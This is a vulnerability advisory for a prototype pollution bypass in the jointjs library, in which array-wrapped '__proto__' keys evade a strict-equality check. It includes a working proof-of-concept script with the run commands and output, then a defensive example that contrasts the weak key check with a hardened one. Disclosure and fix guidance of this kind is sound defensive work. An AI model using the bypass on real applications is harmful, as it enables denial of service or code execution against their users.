The `jointjs` package is vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the path components used in the `path` parameter are arrays. In particular, the condition `key === "__proto__"` returns `false` if `key` is `["__proto__"]`, because the `===` operator always returns `false` when the operands are of different types, while the property access `obj[["__proto__"]]` still coerces the array key to the string `"__proto__"`.
Create the following PoC file:

```javascript
// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
// The array key ["__proto__"] is not === "__proto__", so it passes the check,
// but indexing with it still reaches Object.prototype.
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);
```
Execute the following commands in the terminal:

```sh
npm i jointjs # Install affected module
node poc.js # Run the PoC
```
Check the output:

```text
Before : undefined
After : Yes! Its Polluted
```
It may lead to Information Disclosure, Denial of Service, or Remote Code Execution.
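To make the type confusion concrete from the fixing side, the following added example (not jointjs's own code and not part of the original advisory) models a minimal `setByPath` with the weak strict-equality key check described above next to a hardened check that applies the same string coercion a property access performs before comparing. The names `setByPath`, `isForbiddenWeak`, `isForbiddenStrict` and `demonstrateBypass`/`demonstrateHardened` are chosen here for illustration and do not correspond to the library's API.

```javascript
// Added example: a minimal path setter modelled on the behaviour described
// in the advisory, not jointjs's own implementation. All function names are
// illustrative.

const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

// Weak check: strict equality against a string. An array is never === a
// string, so ["__proto__"] passes, even though obj[["__proto__"]] reaches
// obj["__proto__"] after toString() coercion.
function isForbiddenWeak(key) {
  return key === "__proto__";
}

// Hardened check: normalise the key with the same coercion a property access
// performs, then compare against every name that reaches a prototype.
function isForbiddenStrict(key) {
  return FORBIDDEN.has(String(key));
}

// Walks `path` (an array of components, or a delimited string) and assigns
// `value` at the leaf, creating intermediate objects as needed. The key
// check is injected so both variants can be compared on the same input.
function setByPath(obj, path, value, isForbidden, delim = ".") {
  const keys = Array.isArray(path) ? path : path.split(delim);
  let cur = obj;
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (isForbidden(key)) {
      throw new Error("refusing to set forbidden key: " + String(key));
    }
    if (i === keys.length - 1) {
      cur[key] = value;
    } else {
      if (cur[key] === undefined || cur[key] === null) cur[key] = {};
      cur = cur[key];
    }
  }
  return obj;
}

// Reproduces the bypass with the weak check; `probe` is an unrelated object
// that picks up the value through Object.prototype. The pollution is undone
// in `finally` so the rest of the process is not affected.
function demonstrateBypass() {
  const probe = {};
  try {
    setByPath({}, [["__proto__"], "polluted"], "yes", isForbiddenWeak);
    return probe.polluted; // "yes": the write landed on Object.prototype
  } finally {
    delete Object.prototype.polluted;
  }
}

// Same input against the hardened check: the write is refused and the
// unrelated object stays clean.
function demonstrateHardened() {
  const probe = {};
  let blocked = false;
  try {
    setByPath({}, [["__proto__"], "polluted"], "yes", isForbiddenStrict);
  } catch (e) {
    blocked = true;
  }
  return { blocked, polluted: probe.polluted };
}
```

The design point is that a deny-list on keys must be evaluated on the value the engine will actually use as a property name; comparing against the raw input lets any value whose `toString()` yields `"__proto__"` (including nested arrays) slip through. Using `Object.create(null)` or a `Map` for caller-controlled structures removes the prototype from the picture entirely.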